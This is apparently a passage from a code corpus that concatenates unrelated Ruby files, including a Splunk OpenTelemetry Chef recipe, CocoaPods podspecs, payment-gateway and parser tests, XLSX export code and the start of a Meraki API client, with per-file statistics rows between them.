    action :create
  end
  # Render the templated config when inline config attributes were given...
  template node['splunk_otel_collector']['collector_config_dest'] do
    source 'agent_config.yaml.erb'
    only_if { node['splunk_otel_collector']['collector_config'] != {} }
    notifies :restart, 'windows_service[splunk-otel-collector]', :delayed
  end
  # ...otherwise download the config from the configured source URL.
  remote_file node['splunk_otel_collector']['collector_config_dest'] do
    source "#{node['splunk_otel_collector']['collector_config_source']}"
    only_if { node['splunk_otel_collector']['collector_config'] == {} }
    notifies :restart, 'windows_service[splunk-otel-collector]', :delayed
  end
  windows_service 'splunk-otel-collector' do
    service_name node['splunk_otel_collector']['service_name']
    action [:enable, :start]
  end
  if node['splunk_otel_collector']['with_fluentd'] != false
    include_recipe 'splunk_otel_collector::fluentd_win_install'
  end
elsif platform_family?('debian', 'rhel', 'amazon', 'suse')
  # Per-family package repository setup and prerequisites.
  if platform_family?('debian')
    package %w(apt-transport-https gnupg)
    include_recipe 'splunk_otel_collector::collector_deb_repo'
  elsif platform_family?('rhel', 'amazon')
    package %w(libcap)
    include_recipe 'splunk_otel_collector::collector_yum_repo'
  elsif platform_family?('suse')
    package %w(libcap-progs)
    include_recipe 'splunk_otel_collector::collector_zypper_repo'
  end
  package 'splunk-otel-collector' do
    action :install
    version node['splunk_otel_collector']['collector_version'] if node['splunk_otel_collector']['collector_version'] != 'latest'
    flush_cache [ :before ] if platform_family?('amazon', 'rhel')
    # apt only supports --allow-downgrades from 1.1.0 onward.
    options '--allow-downgrades' if platform_family?('debian') \
      && node['packages'] \
      && node['packages']['apt'] \
      && Gem::Version.new(node['packages']['apt']['version'].split('~')[0]) >= Gem::Version.new('1.1.0')
    allow_downgrade true if platform_family?('amazon', 'rhel', 'suse')
    notifies :restart, 'service[splunk-otel-collector]', :delayed
  end
  include_recipe 'splunk_otel_collector::collector_service_owner'
  directory ::File.dirname(node['splunk_otel_collector']['collector_config_dest']) do
    action :create
  end
  # As on Windows: inline config renders a template, otherwise download.
  template node['splunk_otel_collector']['collector_config_dest'] do
    source 'agent_config.yaml.erb'
    owner node['splunk_otel_collector']['user']
    group node['splunk_otel_collector']['group']
    mode '0600'
    only_if { node['splunk_otel_collector']['collector_config'] != {} }
    notifies :restart, 'service[splunk-otel-collector]', :delayed
  end
  remote_file node['splunk_otel_collector']['collector_config_dest'] do
    source "#{node['splunk_otel_collector']['collector_config_source']}"
    owner node['splunk_otel_collector']['user']
    group node['splunk_otel_collector']['group']
    mode '0600'
    only_if { node['splunk_otel_collector']['collector_config'] == {} }
    notifies :restart, 'service[splunk-otel-collector]', :delayed
  end
  # Environment file consumed by the systemd unit.
  template '/etc/otel/collector/splunk-otel-collector.conf' do
    source 'splunk-otel-collector.conf.erb'
    owner node['splunk_otel_collector']['user']
    group node['splunk_otel_collector']['group']
    mode '0600'
    notifies :restart, 'service[splunk-otel-collector]', :delayed
  end
  service 'splunk-otel-collector' do
    service_name node['splunk_otel_collector']['service_name']
    action [:enable, :start]
  end
  if node['splunk_otel_collector']['with_fluentd'] != false
    # NOTE(review): fluentd is skipped on Ubuntu jammy — presumably no
    # td-agent package exists for it; confirm before changing.
    if platform_family?('debian') && node['lsb']['codename'] != 'jammy'
      include_recipe 'splunk_otel_collector::fluentd_deb_repo'
      include_recipe 'splunk_otel_collector::fluentd_linux_install'
    elsif platform_family?('rhel', 'amazon')
      include_recipe 'splunk_otel_collector::fluentd_yum_repo'
      include_recipe 'splunk_otel_collector::fluentd_linux_install'
    end
  end
else
  raise "Platform family #{platform_family} not supported."
end
| 38.80531 | 128 | 0.729532 |
622049246b929a388c2641950427fbc501b8b277 | 1,159 | Pod::Spec.new do |m|
  # Podspec for the prebuilt dynamic Mapbox iOS SDK framework.
  version = '5.7.0-alpha.1'

  m.name = 'Mapbox-iOS-SDK'
  m.version = version

  m.summary = 'Open source vector map solution for iOS with full styling capabilities.'
  m.description = 'Open source, OpenGL-based vector map solution for iOS with full styling capabilities and Cocoa Touch APIs.'
  m.homepage = 'https://docs.mapbox.com/ios/maps/'
  m.license = { :type => 'BSD', :file => 'LICENSE.md' }
  m.author = { 'Mapbox' => '[email protected]' }
  m.screenshot = "https://docs.mapbox.com/ios/api/maps/#{version}/img/screenshot.png"
  m.social_media_url = 'https://twitter.com/mapbox'
  m.documentation_url = 'https://docs.mapbox.com/ios/api/maps/'

  m.source = {
    :http => "https://mapbox.s3.amazonaws.com/mapbox-gl-native/ios/builds/mapbox-ios-sdk-#{m.version.to_s}-dynamic.zip",
    :flatten => true
  }

  m.platform = :ios
  m.ios.deployment_target = '9.0'
  m.requires_arc = true

  # Ships as a prebuilt binary framework, not source files.
  m.vendored_frameworks = 'dynamic/Mapbox.framework'
  m.module_name = 'Mapbox'

  m.preserve_path = '**/*.bcsymbolmap'

  m.dependency "MapboxMobileEvents", "0.10.2"
end
| 34.088235 | 132 | 0.640207 |
61b310e796854314799d2fa713b24f06cdd00cb3 | 874 | require_relative 'params'
module Twizo
class WidgetParams < Params
attr_accessor :allowed_types, :recipient, :backup_code_identifier, :token_length, :token_type, :body_template, :sender, :sender_ton, :sender_npi, :tag, :dcs
# @return [Object]
def to_json
json = {
:allowedTypes => allowed_types,
:recipient => recipient,
:backupCodeIdentifier => backup_code_identifier,
:tokenLength => token_length,
:tokenType => token_type,
:bodyTemplate => body_template,
:sender => sender,
:senderTon => sender_ton,
:senderNpi => sender_npi,
:tag => tag,
:dcs => dcs
}
json.to_json
end
end
end | 29.133333 | 160 | 0.503432 |
# A bounded Array: once +capacity+ elements are held, adding more evicts
# from the opposite end — push/<< evict the oldest element at the front,
# unshift evicts from the back. Bulk writers (concat/fill) trim the front so
# only the last +capacity+ elements survive.
class SizedArray < Array
  attr_reader :capacity

  def initialize(capacity = 10, *args)
    @capacity = capacity
    super(*args)
  end

  # Drops elements from the front until we are back within capacity.
  def resize
    slice!(0...-@capacity) if size > @capacity
  end
  private :resize

  # Appends +other_array+, trimming the front; returns self like Array#concat.
  def concat(other_array)
    super
    resize
    self
  end

  # Same contract as Array#fill, then trims to capacity; returns self.
  def fill(*args)
    super
    resize
    self
  end

  # Appends one item. Returns self while under capacity; once full, evicts
  # and returns the oldest (front) element instead.
  def <<(item)
    super
    size > @capacity ? shift : self
  end

  def push(item)
    self << item
  end

  # Prepends one item; once over capacity the element at the back is popped
  # and returned.
  def unshift(item)
    super
    size > @capacity ? pop : self
  end
end
| 16.44898 | 42 | 0.478908 |
182c4d4eeeeb70dd6694f57567eaca08c9bcfe65 | 201 | # Simple, obvious (to me) way to do it.
# FizzBuzz over 1..100. BUG FIX: the original used the Ruby 1.8
# `when condition : expression` colon syntax, which was removed in Ruby 1.9
# and is a SyntaxError on every modern interpreter — `then` is the
# supported one-line form.
(1..100).each do |n|
  case
  when n % 15 == 0 then puts 'FizzBuzz'
  when n % 5 == 0 then puts 'Buzz'
  when n % 3 == 0 then puts 'Fizz'
  else puts n
  end
end
| 20.1 | 39 | 0.527363 |
ed9007a08858f3ff76f1db9a1ff0f7a7bf660b4b | 707 | Pod::Spec.new do |s|
  # Podspec for the Amazon Polly component of the AWS iOS SDK; version is
  # kept in lockstep with its AWSCore dependency.
  s.name         = 'AWSPolly'
  s.version      = '2.11.1'
  s.summary      = 'Amazon Web Services SDK for iOS.'

  s.description  = 'The AWS SDK for iOS provides a library, code samples, and documentation for developers to build connected mobile applications using AWS.'

  s.homepage     = 'http://aws.amazon.com/mobile/sdk'
  s.license      = 'Apache License, Version 2.0'
  s.author       = { 'Amazon Web Services' => 'amazonwebservices' }
  s.platform     = :ios, '8.0'
  s.source       = { :git => 'https://github.com/aws/aws-sdk-ios.git',
                     :tag => s.version}
  s.requires_arc = true
  s.dependency 'AWSCore', '2.11.1'
  s.source_files = 'AWSPolly/*.{h,m}'
end
| 39.277778 | 157 | 0.609618 |
f71a3f08705d90384109c36eb3203b8d22946c78 | 1,251 | require "test_helper"
require_relative "signature_helper"
# Tests for Argtrace::TypeLib#learn: repeated identical signatures collapse
# into one entry, and differing return types merge into a type union.
class TracerTest < Minitest::Test
  include SignatureHelper
  # Minimal fixture class whose methods the signatures below describe.
  class X
    def foo(x, y)
      x
    end
    def bar()
      nil
    end
  end
  def test_learn
    lib = Argtrace::TypeLib.new
    # Learning the same foo signature twice must not duplicate entries.
    lib.learn(signature_from(X, :foo, {x: [String], y: [Integer]}, [String]))
    lib.learn(signature_from(X, :foo, {x: [String], y: [Integer]}, [String]))
    lib.learn(signature_from(X, :bar, {}, [NilClass]))
    lib.learn(signature_from(X, :bar, {}, [TrueClass]))
    lib.learn(signature_from(X, :bar, {}, [FalseClass]))
    ans_foo_params = params_from({x: [String], y: [Integer]})
    ans_foo_ret = typeunion_from([String])
    assert_equal 2, lib.lib[X][:foo][0].params.size
    assert_equal_typeunion ans_foo_params[0].type, lib.lib[X][:foo][0].params[0].type
    assert_equal_typeunion ans_foo_params[1].type, lib.lib[X][:foo][0].params[1].type
    assert_equal_typeunion ans_foo_ret, lib.lib[X][:foo][0].return_type
    # NOTE(review): FalseClass was learned but the expected union is only
    # [NilClass, TrueClass] — presumably true/false fold into one boolean
    # type inside the library; confirm against TypeUnion semantics.
    ans_bar_ret = typeunion_from([NilClass, TrueClass])
    assert_equal 0, lib.lib[X][:bar][0].params.size
    assert_equal_typeunion ans_bar_ret, lib.lib[X][:bar][0].return_type
  end
end
class OutputModuleTest < Minitest::Test
  # Placeholder: output-module behavior is not yet covered.
  def test_add_signature
  end
end | 29.093023 | 85 | 0.677858 |
182683bcf305bb6a9baface29ec532f23319b1d8 | 146 | require "test_helper"
class Api::V1::FactsControllerTest < ActionDispatch::IntegrationTest
  # Scaffold-generated placeholder; no facts endpoints are asserted yet.
  # test "the truth" do
  #   assert true
  # end
end
| 18.25 | 68 | 0.726027 |
e264cf32a35f509d81f38d9d460a0f6627adcd97 | 270 | class ApplicationController < ActionController::Base
  protect_from_forgery with: :exception
  include SessionsHelper

  # before_action guard: bounce anonymous users to the login page, saving
  # the requested URL (store_location) so they return after signing in.
  def user_should_have_logged_in
    return if logged_in?
    store_location
    flash[:danger] = "Please login."
    redirect_to login_url
  end
end
| 20.769231 | 52 | 0.77037 |
62e01f1002cd809002a4624a8b9b864f009067b7 | 1,183 | # Copyright 2014 Square Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
# Paperclip attachment spec for Screenshot: presence, content type and size
# validations on :image, plus the 400x200 thumb style.
describe Screenshot do
  it { should have_attached_file(:image) }
  it { should validate_attachment_presence(:image) }
  it { should validate_attachment_content_type(:image).allowing(Screenshot::CONTENT_TYPES) }
  it { should validate_attachment_size(:image).less_than(5.megabytes) }
  it 'creates a thumbs style' do
    expect(Screenshot.attachment_definitions[:image][:styles][:thumb]).to_not be_nil
  end
  it 'creates a dimensions for thumbs style' do
    expect(Screenshot.attachment_definitions[:image][:styles][:thumb]).to eql('400x200')
  end
end
| 38.16129 | 92 | 0.743872 |
b92b13ef34c5c5dbc98f53353f7188b087792577 | 4,875 | require 'test_helper'
class InspireTest < Test::Unit::TestCase
include CommStub
def setup
@gateway = InspireGateway.new(
:login => 'LOGIN',
:password => 'PASSWORD'
)
@credit_card = credit_card('4242424242424242')
@amount = 100
@options = { :billing_address => address }
end
def test_successful_purchase
@gateway.expects(:ssl_post).returns(successful_purchase_response)
assert response = @gateway.authorize(@amount, @credit_card, @options)
assert_instance_of Response, response
assert_success response
assert_equal '510695343', response.authorization
end
def test_failed_purchase
@gateway.expects(:ssl_post).returns(failed_purchase_response)
assert response = @gateway.authorize(@amount, @credit_card, @options)
assert_instance_of Response, response
assert_failure response
end
def test_successful_refund
response = stub_comms do
@gateway.refund(nil, 'identifier')
end.check_request do |_, data, _|
assert_match %r{identifier}, data
assert_no_match %r{amount}, data
end.respond_with(successful_refund_response)
assert_success response
end
def test_partial_refund
response = stub_comms do
@gateway.refund(100, 'identifier')
end.check_request do |_, data, _|
assert_match %r{identifier}, data
assert_match %r{amount}, data
end.respond_with(successful_refund_response)
assert_success response
end
def test_failed_refund
response = stub_comms do
@gateway.refund(nil, 'identifier')
end.respond_with(failed_refund_response)
assert_failure response
end
def test_add_address
result = {}
@gateway.send(:add_address, result, nil, :billing_address => {:address1 => '164 Waverley Street', :country => 'US', :state => 'CO'})
assert_equal ['address1', 'city', 'company', 'country', 'phone', 'state', 'zip'], result.stringify_keys.keys.sort
assert_equal 'CO', result[:state]
assert_equal '164 Waverley Street', result[:address1]
assert_equal 'US', result[:country]
end
def test_supported_countries
assert_equal ['US'], InspireGateway.supported_countries
end
def test_supported_card_types
assert_equal [:visa, :master, :american_express], InspireGateway.supported_cardtypes
end
def test_adding_store_adds_vault_id_flag
result = {}
@gateway.send(:add_creditcard, result, @credit_card, :store => true)
assert_equal ['ccexp', 'ccnumber', 'customer_vault', 'cvv', 'firstname', 'lastname'], result.stringify_keys.keys.sort
assert_equal 'add_customer', result[:customer_vault]
end
def test_blank_store_doesnt_add_vault_flag
result = {}
@gateway.send(:add_creditcard, result, @credit_card, {})
assert_equal ['ccexp', 'ccnumber', 'cvv', 'firstname', 'lastname'], result.stringify_keys.keys.sort
assert_nil result[:customer_vault]
end
def test_accept_check
post = {}
check = Check.new(:name => 'Fred Bloggs',
:routing_number => '111000025',
:account_number => '123456789012',
:account_holder_type => 'personal',
:account_type => 'checking')
@gateway.send(:add_check, post, check)
assert_equal %w[account_holder_type account_type checkaba checkaccount checkname payment], post.stringify_keys.keys.sort
end
def test_funding_source
assert_equal :check, @gateway.send(:determine_funding_source, Check.new)
assert_equal :credit_card, @gateway.send(:determine_funding_source, @credit_card)
assert_equal :vault, @gateway.send(:determine_funding_source, '12345')
end
def test_avs_result
@gateway.expects(:ssl_post).returns(successful_purchase_response)
response = @gateway.purchase(@amount, @credit_card)
assert_equal 'N', response.avs_result['code']
end
def test_cvv_result
@gateway.expects(:ssl_post).returns(successful_purchase_response)
response = @gateway.purchase(@amount, @credit_card)
assert_equal 'N', response.cvv_result['code']
end
private
def successful_purchase_response
'response=1&responsetext=SUCCESS&authcode=123456&transactionid=510695343&avsresponse=N&cvvresponse=N&orderid=ea1e0d50dcc8cfc6e4b55650c592097e&type=sale&response_code=100'
end
def failed_purchase_response
'response=2&responsetext=DECLINE&authcode=&transactionid=510695919&avsresponse=N&cvvresponse=N&orderid=50357660b0b3ef16f72a3d3b83c46983&type=sale&response_code=200'
end
def successful_refund_response
'response=1&responsetext=SUCCESS&authcode=&transactionid=2594884528&avsresponse=&cvvresponse=&orderid=&type=refund&response_code=100'
end
def failed_refund_response
'response=3&responsetext=Invalid Transaction ID specified REFID:3150951931&authcode=&transactionid=&avsresponse=&cvvresponse=&orderid=&type=refund&response_code=300'
end
end
| 34.090909 | 174 | 0.730462 |
b941eab4f434c6c4a6449d1a2fe004d013a3b788 | 131 | module DmcKanye
class Config
class_attribute :script_to_disable_transitions
class_attribute :default_wait_time
end
end
| 18.714286 | 50 | 0.816794 |
11343bf2a4f979e81d0a0e58fa73cf69bc786404 | 9,379 | require 'axlsx'
require 'axlsx_styler'
require 'spreadsheet_architect/axlsx_string_width_patch'
module SpreadsheetArchitect
module ClassMethods
def to_xlsx(opts={})
return to_axlsx_package(opts).to_stream.read
end
def to_axlsx_package(opts={}, package=nil)
opts = SpreadsheetArchitect::Utils.get_options(opts, self)
options = SpreadsheetArchitect::Utils.get_cell_data(opts, self)
if options[:column_types] && !(options[:column_types].compact.collect(&:to_sym) - SpreadsheetArchitect::XLSX_COLUMN_TYPES).empty?
raise SpreadsheetArchitect::Exceptions::ArgumentError.new("Invalid column type. Valid XLSX values are #{SpreadsheetArchitect::XLSX_COLUMN_TYPES}")
end
header_style = SpreadsheetArchitect::Utils::XLSX.convert_styles_to_axlsx(options[:header_style])
row_style = SpreadsheetArchitect::Utils::XLSX.convert_styles_to_axlsx(options[:row_style])
if package.nil?
package = Axlsx::Package.new
end
row_index = -1
package.workbook.add_worksheet(name: options[:sheet_name]) do |sheet|
max_row_length = options[:data].empty? ? 0 : options[:data].max_by{|x| x.length}.length
if options[:headers]
header_style_index = package.workbook.styles.add_style(header_style)
options[:headers].each do |header_row|
row_index += 1
missing = max_row_length - header_row.count
if missing > 0
missing.times do
header_row.push(nil)
end
end
sheet.add_row header_row, style: header_style_index
if options[:conditional_row_styles]
conditional_styles_for_row = SpreadsheetArchitect::Utils::XLSX.conditional_styles_for_row(options[:conditional_row_styles], row_index, header_row)
unless conditional_styles_for_row.empty?
sheet.add_style(
"#{SpreadsheetArchitect::Utils::XLSX::COL_NAMES.first}#{row_index+1}:#{SpreadsheetArchitect::Utils::XLSX::COL_NAMES[max_row_length-1]}#{row_index+1}",
SpreadsheetArchitect::Utils::XLSX.convert_styles_to_axlsx(conditional_styles_for_row)
)
end
end
end
end
if options[:data].empty?
break
end
row_style_index = package.workbook.styles.add_style(row_style)
default_date_style_index = nil
default_time_style_index = nil
options[:data].each do |row_data|
row_index += 1
missing = max_row_length - row_data.count
if missing > 0
missing.times do
row_data.push(nil)
end
end
types = []
styles = []
row_data.each_with_index do |x,i|
if (x.respond_to?(:empty) ? x.empty? : x.nil?)
types[i] = nil
styles[i] = row_style_index
else
if options[:column_types]
types[i] = options[:column_types][i]
end
types[i] ||= SpreadsheetArchitect::Utils::XLSX.get_type(x)
if [:date, :time].include?(types[i])
if types[i] == :date
default_date_style_index ||= package.workbook.styles.add_style(row_style.merge({format_code: 'yyyy-mm-dd'}))
styles[i] = default_date_style_index
else
default_time_style_index ||= package.workbook.styles.add_style(row_style.merge({format_code: 'yyyy-mm-dd h:mm AM/PM'}))
styles[i] = default_time_style_index
end
else
styles[i] = row_style_index
end
end
end
sheet.add_row row_data, style: styles, types: types, escape_formulas: options[:escape_formulas]
if options[:conditional_row_styles]
options[:conditional_row_styles] = SpreadsheetArchitect::Utils.hash_array_symbolize_keys(options[:conditional_row_styles])
conditional_styles_for_row = SpreadsheetArchitect::Utils::XLSX.conditional_styles_for_row(options[:conditional_row_styles], row_index, row_data)
unless conditional_styles_for_row.empty?
sheet.add_style(
"#{SpreadsheetArchitect::Utils::XLSX::COL_NAMES.first}#{row_index+1}:#{SpreadsheetArchitect::Utils::XLSX::COL_NAMES[max_row_length-1]}#{row_index+1}",
SpreadsheetArchitect::Utils::XLSX.convert_styles_to_axlsx(conditional_styles_for_row)
)
end
end
end
if options[:column_widths]
sheet.column_widths(*options[:column_widths])
end
if options[:borders] || options[:column_styles] || options[:range_styles] || options[:merges]
num_rows = options[:data].count + (options[:headers] ? options[:headers].count : 0)
end
if options[:borders]
options[:borders] = SpreadsheetArchitect::Utils.hash_array_symbolize_keys(options[:borders])
options[:borders].each do |x|
if x[:range].is_a?(Hash)
x[:range] = SpreadsheetArchitect::Utils::XLSX.range_hash_to_str(x[:range], max_row_length, num_rows)
else
SpreadsheetArchitect::Utils::XLSX.verify_range(x[:range], num_rows)
end
sheet.add_border x[:range], (x[:border_styles] || x[:styles])
end
end
if options[:column_styles]
options[:column_styles] = SpreadsheetArchitect::Utils.hash_array_symbolize_keys(options[:column_styles])
options[:column_styles].each do |x|
start_row = (options[:headers] ? options[:headers].count : 0) + 1
x[:styles] = SpreadsheetArchitect::Utils::XLSX.convert_styles_to_axlsx(x[:styles])
add_column_style = ->(col){
SpreadsheetArchitect::Utils::XLSX.verify_column(col, max_row_length)
range_str = SpreadsheetArchitect::Utils::XLSX.range_hash_to_str({rows: (start_row..num_rows), columns: col}, max_row_length, num_rows)
sheet.add_style range_str, x[:styles]
if x[:include_header] && start_row > 1
range_str = SpreadsheetArchitect::Utils::XLSX.range_hash_to_str({rows: (1..start_row-1), columns: col}, max_row_length, num_rows)
sheet.add_style(range_str, x[:styles])
end
}
case x[:columns]
when Array, Range
x[:columns].each do |col|
add_column_style.call(col)
end
when Integer, String
add_column_style.call(x[:columns])
else
SpreadsheetArchitect::Utils::XLSX.verify_column(x[:columns], max_row_length)
end
end
end
if options[:range_styles]
options[:range_styles] = SpreadsheetArchitect::Utils.hash_array_symbolize_keys(options[:range_styles])
options[:range_styles].each do |x|
styles = SpreadsheetArchitect::Utils::XLSX.convert_styles_to_axlsx(x[:styles])
if x[:range].is_a?(Hash)
x[:range] = SpreadsheetArchitect::Utils::XLSX.range_hash_to_str(x[:range], max_row_length, num_rows)
else
SpreadsheetArchitect::Utils::XLSX.verify_range(x[:range], num_rows)
end
sheet.add_style x[:range], styles
end
end
if options[:merges]
options[:merges] = SpreadsheetArchitect::Utils.hash_array_symbolize_keys(options[:merges])
options[:merges].each do |x|
if x[:range].is_a?(Hash)
x[:range] = SpreadsheetArchitect::Utils::XLSX.range_hash_to_str(x[:range], max_row_length, num_rows)
else
SpreadsheetArchitect::Utils::XLSX.verify_range(x[:range], num_rows)
end
sheet.merge_cells x[:range]
end
end
if options[:freeze_headers]
sheet.sheet_view.pane do |pane|
pane.state = :frozen
pane.y_split = options[:headers].count
end
elsif options[:freeze]
options[:freeze] = SpreadsheetArchitect::Utils.symbolize_keys(options[:freeze])
sheet.sheet_view.pane do |pane|
pane.state = :frozen
### Currently not working
#if options[:freeze][:active_pane]
# Axlsx.validate_pane_type(options[:freeze][:active_pane])
# pane.active_pane = options[:freeze][:active_pane]
#else
# pane.active_pane = :bottom_right
#end
if !options[:freeze][:rows]
raise SpreadsheetArchitect::Exceptions::ArgumentError.new("The :rows key must be specified in the :freeze option hash")
elsif options[:freeze][:rows].is_a?(Range)
pane.y_split = options[:freeze][:rows].count
else
pane.y_split = 1
end
if options[:freeze][:columns] && options[:freeze][:columns] != :all
if options[:freeze][:columns].is_a?(Range)
pane.x_split = options[:freeze][:columns].count
else
pane.x_split = 1
end
end
end
end
end
return package
end
end
end
| 37.218254 | 168 | 0.603263 |
286dc7022bd38e6db21d163117723c0d5027dc11 | 167 | # http://www.codewars.com/kata/56445cc2e5747d513c000033
# --- iteration 1 ---
# Returns true when +msg+ is a well-formed broadcast string: the literal
# callsign "MDZHB", a two-digit group, a three-digit group, an uppercase
# codeword, then four two-digit groups — and nothing else around them.
def validate(msg)
  pattern = /\AMDZHB \d{2} \d{3} [A-Z]+ \d{2} \d{2} \d{2} \d{2}\z/
  pattern === msg
end
| 23.857143 | 65 | 0.580838 |
ffb1ca7cbf8fe74aa02f7312545c7733fa314764 | 455 | # frozen_string_literal: true
# Join record marking a project as "featured". Creating one notifies the
# project's author by email, and only public projects may be featured.
class FeaturedCircuit < ApplicationRecord
  belongs_to :project
  # Notify the author once, right after the feature record is created.
  after_create :featured_circuit_email
  validate :project_public
  private
  # Validation: a featured project must have public access.
  # NOTE(review): compares against the literal string "Public" — presumably
  # project_access_type is a string enum; verify against the Project model.
  def project_public
    if project.project_access_type != "Public"
      errors.add(:project, "Featured projects have to be public")
    end
  end
  # Queue the "your circuit was featured" email asynchronously.
  def featured_circuit_email
    UserMailer.featured_circuit_email(project.author, project).deliver_later
  end
end
| 21.666667 | 78 | 0.749451 |
bbfe784d467961a47de671d9be65291f235a017d | 2,151 | require 'date'
# RequestLogAnalyzer is the base namespace in which all functionality of RequestLogAnalyzer is implemented.
# This module itself contains some functions to help with class and source file loading. The actual
# application startup code resides in the {RequestLogAnalyzer::Controller} class.
#
# The {RequestLogAnalyzer::VERSION} constant can be used to determine what version of request-log-analyzer
# is running.
module RequestLogAnalyzer
  # Translate a camel-cased constant name (e.g. "RequestLogAnalyzer::Controller")
  # into its underscored path form ("request_log_analyzer/controller"), suitable
  # for locating the file that defines the constant.
  #
  # @param [#to_s] str A constant-like name in <tt>ModuleName::ClassName</tt> form.
  # @return [String] The underscored, slash-separated equivalent.
  def self.to_underscore(str)
    path = str.to_s.gsub('::', '/')
    snake = path.gsub(/([A-Z]+)([A-Z][a-z])/, '\1_\2')
    snake = snake.gsub(/([a-z\d])([A-Z])/, '\1_\2')
    snake.tr('-', '_').downcase
  end

  # Translate an underscored path (e.g. "request_log_analyzer/controller") into
  # the camel-cased constant name ("RequestLogAnalyzer::Controller") that a file
  # of that name defines.
  #
  # @param [#to_s] str A path-like name in <tt>module_name/class_name</tt> form.
  # @return [String] The camel-cased equivalent.
  def self.to_camelcase(str)
    namespaced = str.to_s.gsub(%r{/(.?)}) { "::#{Regexp.last_match(1).upcase}" }
    namespaced.gsub(/(^|_)(.)/) { Regexp.last_match(2).upcase }
  end
end
require 'request_log_analyzer/version'
require 'request_log_analyzer/controller'
require 'request_log_analyzer/aggregator'
require 'request_log_analyzer/class_level_inheritable_attributes'
require 'request_log_analyzer/file_format'
require 'request_log_analyzer/filter'
require 'request_log_analyzer/line_definition'
require 'request_log_analyzer/log_processor'
require 'request_log_analyzer/mailer'
require 'request_log_analyzer/output'
require 'request_log_analyzer/request'
require 'request_log_analyzer/source'
require 'request_log_analyzer/tracker'
| 48.886364 | 122 | 0.757787 |
7a103ce44064fbcd4ca2d37d2e255c9e28680434 | 41 | include_recipe 'delivery-truck::default'
| 20.5 | 40 | 0.829268 |
e86d94b1ec6b3760d6ee9569c76973860711efb5 | 943 | module Trample
class Page
attr_reader :request_method, :think_time
def initialize(request_method, url, think_time, parameters = {})
@request_method = request_method
@url = url
@think_time = think_time
@parameters = parameters
end
def parameters
proc_params? ? @parameters.call : @parameters
end
def ==(other)
other.is_a?(Page) &&
other.request_method == request_method &&
other.url == url &&
other.think_time == think_time
end
def url
proc_params? ? interpolated_url : @url
end
protected
def proc_params?
@parameters.is_a?(Proc)
end
def interpolated_url
params = parameters # cache called proc
url = @url.dup
url.scan(/\:[A-Za-z_]\w+/).each do |m|
url.gsub!(m, params[m.gsub(/:/, '').to_sym].to_s)
end
url
end
end
end
| 22.452381 | 68 | 0.566278 |
b9bdd415066d8d56f62f84deb7aafb9cfc521942 | 2,024 | require 'helper'
require 'faraday_middleware/response/parse_xml'
describe FaradayMiddleware::ParseXml, :type => :response do
let(:xml) { '<user><name>Erik Michaels-Ober</name><screen_name>sferik</screen_name></user>' }
let(:user) { {'user' => {'name' => 'Erik Michaels-Ober', 'screen_name' => 'sferik'} } }
context "no type matching" do
it "doesn't change nil body" do
expect(process(nil).body).to be_nil
end
it "turns empty body into empty hash" do
expect(process('').body).to be_eql({})
end
it "parses xml body" do
response = process(xml)
expect(response.body).to eq(user)
expect(response.env[:raw_body]).to be_nil
end
end
context "with preserving raw" do
let(:options) { {:preserve_raw => true} }
it "parses xml body" do
response = process(xml)
expect(response.body).to eq(user)
expect(response.env[:raw_body]).to eq(xml)
end
it "can opt out of preserving raw" do
response = process(xml, nil, :preserve_raw => false)
expect(response.env[:raw_body]).to be_nil
end
end
context "with regexp type matching" do
let(:options) { {:content_type => /\bxml$/} }
it "parses xml body of correct type" do
response = process(xml, 'application/xml')
expect(response.body).to eq(user)
end
it "ignores xml body of incorrect type" do
response = process(xml, 'text/html')
expect(response.body).to eq(xml)
end
end
context "with array type matching" do
let(:options) { {:content_type => %w[a/b c/d]} }
it "parses xml body of correct type" do
expect(process(xml, 'a/b').body).to be_a(Hash)
expect(process(xml, 'c/d').body).to be_a(Hash)
end
it "ignores xml body of incorrect type" do
expect(process(xml, 'a/d').body).not_to be_a(Hash)
end
end
it "chokes on invalid xml" do
['{!', '"a"', 'true', 'null', '1'].each do |data|
expect{ process(data) }.to raise_error(Faraday::Error::ParsingError)
end
end
end
| 28.111111 | 96 | 0.630929 |
28eaccbe484d9e5e6e37cb1742660e2f3500a22f | 118 | RSpec.configure do |config|
config.before(:each) do
ApplicationController.current_user = User.create!
end
end
| 19.666667 | 53 | 0.754237 |
f86bfc6f8f25ccb72766b424894ad6470478f34c | 1,141 | class Wv2 < Formula
desc "Programs for accessing Microsoft Word documents"
homepage "https://wvware.sourceforge.io/"
url "https://downloads.sourceforge.net/project/wvware/wv2-0.4.2.tar.bz2"
sha256 "9f2b6d3910cb0e29c9ff432f935a594ceec0101bca46ba2fc251aff251ee38dc"
bottle do
cellar :any
sha256 "7bda8de476777410ab350ceca0e089e20169f17a3d9cb31d313653c906766a85" => :mojave
sha256 "35120de253c5dcfd6da711f7529bd8e4a0ffd45eed540057ef57d1a9d2ab0091" => :high_sierra
sha256 "cd0856f53f0a143f5b0ea7dd61a0d23613db6de84538fa222e2819217a3ed3af" => :sierra
sha256 "b3a07e873f69b90ed83d47ccedb6bc5fefcb5dc5c9ffd1ecfd38c03dd094afea" => :el_capitan
sha256 "51ea82d6630ceee1739d0f252462ef8c4394ffaf0fb81b0a5141990f865f1427" => :yosemite
sha256 "e91c85bf622d483194ab85c78c7b8131de245f54f64ee61a961c0b24d31545cc" => :mavericks
end
depends_on "cmake" => :build
depends_on "pkg-config" => :build
depends_on "glib"
depends_on "libgsf"
def install
ENV.append "LDFLAGS", "-liconv -lgobject-2.0" # work around broken detection
system "cmake", ".", *std_cmake_args
system "make", "install"
end
end
| 40.75 | 93 | 0.787029 |
7aae344236b1cddd321f02b4aa8b6f85fcc053d6 | 11,399 | # meraki
#
# This file was automatically generated by APIMATIC v2.0
# ( https://apimatic.io ).
module Meraki
# meraki client class.
class MerakiClient
# Singleton access to organizations controller.
# @return [OrganizationsController] Returns the controller instance.
def organizations
OrganizationsController.instance
end
# Singleton access to mx_1_many_nat_rules controller.
# @return [MX1ManyNATRulesController] Returns the controller instance.
def mx_1_many_nat_rules
MX1ManyNATRulesController.instance
end
# Singleton access to firewalled_services controller.
# @return [FirewalledServicesController] Returns the controller instance.
def firewalled_services
FirewalledServicesController.instance
end
# Singleton access to traffic_shaping controller.
# @return [TrafficShapingController] Returns the controller instance.
